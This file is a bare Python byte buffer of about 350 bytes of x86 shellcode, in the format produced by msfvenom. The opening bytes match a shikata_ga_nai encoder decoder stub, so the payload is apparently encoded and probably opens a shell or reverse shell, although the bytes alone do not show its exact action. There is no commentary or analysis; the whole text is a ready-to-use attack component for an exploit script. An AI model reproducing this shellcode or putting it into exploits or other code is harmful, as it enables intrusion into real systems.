buf =  b""
buf += b"\xb8\x76\x71\xad\xe9\xda\xcd\xd9\x74\x24\xf4\x5d"
buf += b"\x33\xc9\xb1\x52\x31\x45\x12\x83\xc5\x04\x03\x33"
buf += b"\x7f\x4f\x1c\x47\x97\x0d\xdf\xb7\x68\x72\x69\x52"
buf += b"\x59\xb2\x0d\x17\xca\x02\x45\x75\xe7\xe9\x0b\x6d"
buf += b"\x7c\x9f\x83\x82\x35\x2a\xf2\xad\xc6\x07\xc6\xac"
buf += b"\x44\x5a\x1b\x0e\x74\x95\x6e\x4f\xb1\xc8\x83\x1d"
buf += b"\x6a\x86\x36\xb1\x1f\xd2\x8a\x3a\x53\xf2\x8a\xdf"
buf += b"\x24\xf5\xbb\x4e\x3e\xac\x1b\x71\x93\xc4\x15\x69"
buf += b"\xf0\xe1\xec\x02\xc2\x9e\xee\xc2\x1a\x5e\x5c\x2b"
buf += b"\x93\xad\x9c\x6c\x14\x4e\xeb\x84\x66\xf3\xec\x53"
buf += b"\x14\x2f\x78\x47\xbe\xa4\xda\xa3\x3e\x68\xbc\x20"
buf += b"\x4c\xc5\xca\x6e\x51\xd8\x1f\x05\x6d\x51\x9e\xc9"
buf += b"\xe7\x21\x85\xcd\xac\xf2\xa4\x54\x09\x54\xd8\x86"
buf += b"\xf2\x09\x7c\xcd\x1f\x5d\x0d\x8c\x77\x92\x3c\x2e"
buf += b"\x88\xbc\x37\x5d\xba\x63\xec\xc9\xf6\xec\x2a\x0e"
buf += b"\xf8\xc6\x8b\x80\x07\xe9\xeb\x89\xc3\xbd\xbb\xa1"
buf += b"\xe2\xbd\x57\x31\x0a\x68\xf7\x61\xa4\xc3\xb8\xd1"
buf += b"\x04\xb4\x50\x3b\x8b\xeb\x41\x44\x41\x84\xe8\xbf"
buf += b"\x02\xa1\xec\xbd\xd4\xdd\xee\xc1\xc9\x41\x66\x27"
buf += b"\x83\x69\x2e\xf0\x3c\x13\x6b\x8a\xdd\xdc\xa1\xf7"
buf += b"\xde\x57\x46\x08\x90\x9f\x23\x1a\x45\x50\x7e\x40"
buf += b"\xc0\x6f\x54\xec\x8e\xe2\x33\xec\xd9\x1e\xec\xbb"
buf += b"\x8e\xd1\xe5\x29\x23\x4b\x5c\x4f\xbe\x0d\xa7\xcb"
buf += b"\x65\xee\x26\xd2\xe8\x4a\x0d\xc4\x34\x52\x09\xb0"
buf += b"\xe8\x05\xc7\x6e\x4f\xfc\xa9\xd8\x19\x53\x60\x8c"
buf += b"\xdc\x9f\xb3\xca\xe0\xf5\x45\x32\x50\xa0\x13\x4d"
buf += b"\x5d\x24\x94\x36\x83\xd4\x5b\xed\x07\xe4\x11\xaf"
buf += b"\x2e\x6d\xfc\x3a\x73\xf0\xff\x91\xb0\x0d\x7c\x13"
buf += b"\x49\xea\x9c\x56\x4c\xb6\x1a\x8b\x3c\xa7\xce\xab"
buf += b"\x93\xc8\xda"
